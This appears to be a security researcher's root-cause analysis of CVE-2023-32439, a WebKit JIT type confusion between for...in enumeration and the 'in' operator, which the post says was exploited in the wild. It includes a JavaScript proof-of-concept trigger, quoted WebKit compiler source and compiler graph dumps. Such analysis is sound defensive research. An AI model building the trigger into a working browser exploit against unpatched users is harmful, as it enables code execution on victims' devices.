Sunjoo Park @grigoritchy
2 weeks ago in 21 June 2023, Apple have updated new security patch for Webkit(CVE-2023-32439) in iOS 16.5 and Apple suspected this bug is used in the wild activly.
Overview
Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 256567
CVE-2023-32439: an anonymous researcher
Affected Version: Safari 16.5 and below versions
Issue Report: https://bugs.webkit.org/show_bug.cgi?id=256567
Patch Commit Log: https://github.com/WebKit/WebKit/commit/52fe95e5805c735cc1fa4d6200fcaa1912efbfea
Proof Of Concept
const arr = [0];
function jitter() {
for (let _ in arr) { // create EnumeratorNextUpdateIndexAndMode DFG node.
return 0 in arr; // create HasIndexedProperty DFG node.
}
}
function trigger() {
let a = jitter(); // a == true
for(let i = 0; i < 0x100000; i++) {
jitter(); // making hot jitter function until it generates FTL bytecode.
}
let b = jitter(); // b == 0
if (a != b) {
print("a != b");
}
}
trigger();
There was a testcase script available with patch commit log. This testcase made me easier to write PoC thankfully.
Detail
When JavaScriptCore execute for…in javascript syntax, JavascriptCore lexer parser create ForInNode
that generate several low level interpreter opcodes. To handle ForInNode
AST node as expectation of javascript behavior, it first generate op_get_property_enumerator
opcode to create enumerator object and then this enumerator is used for op_enumerator_next
opcode. op_enumerator_next
is generated within for loop, which for loop is also opcode too. This loop continues until property name that is a result of op_enumerator_next
is not exist. op_enumerator_next
argument index is fixed as 0, which is used as a start index of enumerator.
// /Source/JavaScriptCore/dfg/DFGByteCodeParser.cpp
void ByteCodeParser::parseBlock(unsigned limit)
{
...
case op_get_property_enumerator: {
auto bytecode = currentInstruction->as<OpGetPropertyEnumerator>();
set(bytecode.m_dst, addToGraph(GetPropertyEnumerator, get(bytecode.m_base)));
NEXT_OPCODE(op_get_property_enumerator);
}
case op_enumerator_next: {
auto bytecode = currentInstruction->as<OpEnumeratorNext>();
auto& metadata = bytecode.metadata(codeBlock);
ArrayMode arrayMode = getArrayMode(metadata.m_arrayProfile, Array::Read);
Node* base = get(bytecode.m_base);
Node* index = get(bytecode.m_index);
Node* enumerator = get(bytecode.m_enumerator);
Node* mode = get(bytecode.m_mode);
auto seenModes = OptionSet<JSPropertyNameEnumerator::Flag>::fromRaw(metadata.m_enumeratorMetadata);
if (!seenModes)
addToGraph(ForceOSRExit);
addVarArgChild(base);
addVarArgChild(index);
addVarArgChild(mode);
addVarArgChild(enumerator);
addVarArgChild(nullptr); // storage for IndexedMode only.
Node* updatedIndexAndMode = addToGraph(Node::VarArg, EnumeratorNextUpdateIndexAndMode, OpInfo(arrayMode.asWord()), OpInfo(seenModes));
Node* updatedMode = addToGraph(EnumeratorNextExtractMode, updatedIndexAndMode);
set(bytecode.m_mode, updatedMode);
Node* updatedIndex = addToGraph(EnumeratorNextExtractIndex, updatedIndexAndMode);
set(bytecode.m_index, updatedIndex);
set(bytecode.m_propertyName, addToGraph(EnumeratorNextUpdatePropertyName, OpInfo(), OpInfo(seenModes), updatedIndex, updatedMode, enumerator));
NEXT_OPCODE(op_enumerator_next);
}
So for…in javascript syntax is essentially generate two opcode op_get_property_enumerator
and op_enumerator_next
. When the function executed many times so tierup counter touched threshold of DFG compilation, these are later turn into GetPropertyEnumerator
and EnumeratorNextUpdateIndexAndMode
, EnumeratorNextExtractMode
, EnumeratorNextExtractIndex
, EnumeratorNextUpdatePropertyName
DFG node sequentially. EnumeratorNextExtractMode
DFG node is converted to JSConstant with mode of enumerator that is JSPropertyNameEnumerator::Flag
while DFG constant folding phase is running. It becuase DFGAI set constant value with jsNumber
and marks flag of try constant folding as true if JSPropertyNameEnumerator::Flag
is JSPropertyNameEnumerator::IndexedMode
or JSPropertyNameEnumerator::OwnStructureMode
.
// /Source/JavaScriptCore/dfg/DFGByteCodeParser.cpp
void ByteCodeParser::parseBlock(unsigned limit)
{
...
case op_in_by_val: {
auto bytecode = currentInstruction->as<OpInByVal>();
Node* base = get(bytecode.m_base);
Node* property = get(bytecode.m_property);
bool compiledAsInById = false;
if (!m_inlineStackTop->m_exitProfile.hasExitSite(m_currentIndex, BadIdent)
&& !m_inlineStackTop->m_exitProfile.hasExitSite(m_currentIndex, BadType)
&& !m_inlineStackTop->m_exitProfile.hasExitSite(m_currentIndex, BadConstantValue)) {
InByStatus status = InByStatus::computeFor(
m_inlineStackTop->m_profiledBlock, m_inlineStackTop->m_baselineMap,
m_icContextStack, currentCodeOrigin());
if (CacheableIdentifier identifier = status.singleIdentifier()) {
UniquedStringImpl* uid = identifier.uid();
m_graph.identifiers().ensure(uid);
if (identifier.isCell()) {
FrozenValue* frozen = m_graph.freezeStrong(identifier.cell());
if (identifier.isSymbolCell())
addToGraph(CheckIsConstant, OpInfo(frozen), property);
else
addToGraph(CheckIdent, OpInfo(uid), property);
} else
addToGraph(CheckIdent, OpInfo(uid), property);
handleInById(bytecode.m_dst, base, identifier, status);
compiledAsInById = true;
}
}
if (!compiledAsInById) {
ArrayMode arrayMode = getArrayMode(bytecode.metadata(codeBlock).m_arrayProfile, Array::Read);
set(bytecode.m_dst, addToGraph(InByVal, OpInfo(arrayMode.asWord()), base, property));
}
NEXT_OPCODE(op_in_by_val);
}
In case of in operator, lexer parser create InNode
, which AST node generate op_in_by_val
low level interpreter opcode, then which node will be converted to InByVal
DFG node when it compiles to DFG. InByVal
node is converted to HasIndexedProperty
node in the DFG fixup phase if base of InByVal
is speculated as object type and property is speculated as integer type. this speculated type is measured while executing prediction injection phase and DFG bytecode generator.
// /Source/JavaScriptCore/dfg/DFGClobberize.h
template<typename ReadFunctor, typename WriteFunctor, typename DefFunctor, typename ClobberTopFunctor>
void clobberize(Graph& graph, Node* node, const ReadFunctor& read, const WriteFunctor& write, const DefFunctor& def, const ClobberTopFunctor& clobberTopFunctor)
{
...
case EnumeratorNextUpdateIndexAndMode:
case HasIndexedProperty: {
if (node->op() == EnumeratorNextUpdateIndexAndMode) {
if (node->enumeratorMetadata() == JSPropertyNameEnumerator::OwnStructureMode && graph.varArgChild(node, 0).useKind() == CellUse) {
read(JSObject_butterfly);
read(NamedProperties);
read(JSCell_structureID);
return;
}
if (node->enumeratorMetadata() != JSPropertyNameEnumerator::IndexedMode) {
clobberTop();
return;
}
}
read(JSObject_butterfly);
ArrayMode mode = node->arrayMode();
switch (mode.type()) {
case Array::ForceExit: {
write(SideState);
return;
}
case Array::Int32: {
if (mode.isInBounds()) {
read(Butterfly_publicLength);
read(IndexedInt32Properties);
def(HeapLocation(HasIndexedPropertyLoc, IndexedInt32Properties, graph.varArgChild(node, 0), graph.varArgChild(node, 1)), LazyNode(node));
return;
}
break;
}
....
The noticeable patch is in the clobberize
of DFGClobberize
function. clobberize
of DFGClobberize
function checks whether node can eliminate or clobber as an other node to enhance performance of DFG execution. EnumeratorNextUpdateIndexAndMode
and HasIndexedProperty
DFG node use same HasIndexedPropertyLoc
value at LocationKind
of HeapLocation
before the patch applied. Then that HeapLocation
is defined as key by def
method that is forwarded by clobberize argument. There is only one place that is defined def
method is using it - common subexpression elimination phase.
As we can guess this behavior by looking the phase name of CSE(Common Subexpression Elimination), The purpose of CSE is elimination to optimize same kind of operation. CSE have two type elimination - Local, Global. Local is only searching for target nodes in the same Block. Global is searching for target nodes in the different Blocks that are dominated by current Block of target node. LCSE(Local CSE) phase is running in the DFG tier and GCSE(Global CSE) phase is running in the FTL tier.
If it can make that EnumeratorNextUpdateIndexAndMode
and HasIndexedProperty
DFG node use same HeapLocation
, GCSE phase decide to that these node are same side of effect so it is replaced with one node. All of HasIndexedProperty
node that using it as children will be replaced with EnumeratorNextUpdateIndexAndMode
node as a result in the GCSE phase. DFGAI set speculatedType
of EnumeratorNextUpdateIndexAndMode
node to SpecBytecodeNumber
and speculatedType
of HasIndexedProperty
node to SpecBoolean
. So it can lead to type confusion that makes DFG thinking that node has SpecBoolean
type is now SpecBytecodeNumber
type if it can make same HeapLocation
for two node.
Below list is condition to replace HasIndexedProperty
node with EnumeratorNextUpdateIndexAndMode
,
- The code has to tiered up to FTL. Because LCSE can’t replace nodes since each nodes contain in different block.
- for…in should use
JSPropertyNameEnumerator::IndexedMode
. - for…in and in operator should use same array.
- Array type should be one of these type - Array::Int32, Array::Double, Array::Contiguous.
Array::Speculation
should be InBounds or InBoundSaneChain.- in operator should use index 0. Beacuse
EnumeratorNextUpdateIndexAndMode
use fixed index 0 that is way ofForInNode
handling.
DFG bytecodes before beginning global common subexpression elimination phase
1 27: Block #1 (bc#38): (OSR target)
...
7 1 27: D@92:< 1:-> GetButterfly(Cell:D@29, Storage|PureInt, R:JSObject_butterfly, Exits, bc#40, ExitValid)
8 1 27: D@48:< 1:-> EnumeratorNextUpdateIndexAndMode(Cell:D@29, KnownInt32:D@32, KnownInt32:D@32, KnownCell:D@37, Check:Untyped:D@92, JS|VarArgs|UseAsOther, BoolInt32|NonBoolInt32|BytecodeDouble|DoubleImpureNaN|Int52Any, Int32+OriginalCopyOnWriteArray+InBoundsSaneChain+AsIs+Read, enumeratorModes = 1, R:Butterfly_publicLength,JSObject_butterfly,IndexedInt32Properties, Exits, bc#40, ExitValid)
...
20 1 27: D@58:< 1:-> CompareEqPtr(Check:Untyped:D@53, Boolean|UseAsOther, Bool, <0x62d0000051f0, string, [1], [8 0x603000000d14]>, Exits, bc#47, ExitValid)
21 1 27: D@59:<!0:-> Branch(KnownBoolean:D@58, MustGen, T:#4/w:1.000000, F:#2/w:1.000000, W:SideState, bc#47, ExitValid)
2 27: Block #2 (bc#51):
...
12 2 27: D@94:< 1:-> GetButterfly(Cell:D@29, Storage|PureInt, R:JSObject_butterfly, Exits, bc#69, ExitValid)
13 2 27: D@81:< 1:-> GetArrayLength(Check:KnownCell:D@29, Check:Untyped:D@94, Int32|PureInt, Int32, Int32+OriginalCopyOnWriteArray+InBoundsSaneChain+AsIs+Read, R:Butterfly_publicLength, Exits, bc#69, ExitValid)
14 2 27: D@84:<!0:-> CheckInBounds(Int32:D@32, Check:KnownInt32:D@81, JS|MustGen|PureInt, Int32, Exits, bc#69, ExitValid)
15 2 27: D@73:< 1:-> HasIndexedProperty(Object:D@29, Int32:D@32, Check:Untyped:D@94, Check:Untyped:D@84, Boolean|VarArgs|PureInt, Bool, Int32+OriginalCopyOnWriteArray+InBoundsSaneChain+AsIs+Read, R:Butterfly_publicLength,JSObject_butterfly,IndexedInt32Properties, Exits, bc#69, ExitValid)
...
19 2 27: D@76:<!0:-> Return(Check:Untyped:D@73, MustGen, W:SideState, Exits, bc#74, ExitValid)
DFG bytecodes after running global common subexpression elimination phase
1 28: Block #1 (bc#38): (OSR target)
...
7 1 28: D@92:< 1:-> GetButterfly(Cell:D@29, Storage|PureInt, R:JSObject_butterfly, Exits, bc#40, ExitValid)
8 1 28: D@48:< 1:-> EnumeratorNextUpdateIndexAndMode(Cell:D@29, KnownInt32:D@32, KnownInt32:D@32, KnownCell:D@37, Check:Untyped:D@92, JS|VarArgs|UseAsOther, BoolInt32|NonBoolInt32|BytecodeDouble|DoubleImpureNaN|Int52Any, Int32+OriginalCopyOnWriteArray+InBoundsSaneChain+AsIs+Read, enumeratorModes = 1, R:Butterfly_publicLength,JSObject_butterfly,IndexedInt32Properties, Exits, bc#40, ExitValid)
...
20 1 28: D@58:< 1:-> CompareEqPtr(Check:Untyped:D@53, Boolean|UseAsOther, Bool, <0x62d0000051f0, string, [1], [8 0x603000000d14]>, Exits, bc#47, ExitValid)
21 1 28: D@59:<!0:-> Branch(KnownBoolean:D@58, MustGen, T:#4/w:1.000000, F:#2/w:1.000000, W:SideState, bc#47, ExitValid)
2 28: Block #2 (bc#51):
...
13 2 28: D@81:< 1:-> GetArrayLength(Check:KnownCell:D@29, Check:Untyped:D@92, Int32|PureInt, Int32, Int32+OriginalCopyOnWriteArray+InBoundsSaneChain+AsIs+Read, R:Butterfly_publicLength, Exits, bc#69, ExitValid)
14 2 28: D@84:<!0:-> CheckInBounds(Int32:D@32, Check:KnownInt32:D@81, JS|MustGen|PureInt, Int32, Exits, bc#69, ExitValid)
15 2 28: D@73:<!0:-> CheckVarargs(MustGen|VarArgs, Bool, bc#69, ExitValid)
...
19 2 28: D@76:<!0:-> Return(Check:Untyped:D@48, MustGen, W:SideState, Exits, bc#74, ExitValid)
The DFG node at D@73
HasIndexedProperty
is removed and added new CheckVarargs
DFG node since this node has children nodes. This is a DFG behavior to create no-op for this removed DFG node. At D@76
Return
DFG node has different children - D@73
—> D@48
. D@73
is HasIndexedProperty
DFG node and D@48
is EnumeratorNextUpdateIndexAndMode
DFG node. The result of D@48
EnumeratorNextUpdateIndexAndMode
DFG node value is current index of enumerator, which is integer value. And then after GCSE, DFG now treat this value as boolean type. Because it was a boolean type before the GCSE. That was return value of HasIndexedProperty
DFG node.
Conclude
We’ve explored Root Cause Analysis of CVE-2023-32439 WebKit vulnerability, which is used in the wild. It means with this boolean-number type confusion vulnerability, an attacker could make aar/aaw primitive gracely. To make this primitive, further research is required for how to abuse this boolean speculated type to create side effect in the DFG and FTL. Apple addressed this issue by patching WebKit to use different HeapLocation
for EnumeratorNextUpdateIndexAndMode
and HasIndexedProperty
DFG node by introducing new HeapLocation
EnumeratorNextUpdateIndexAndModeLoc
.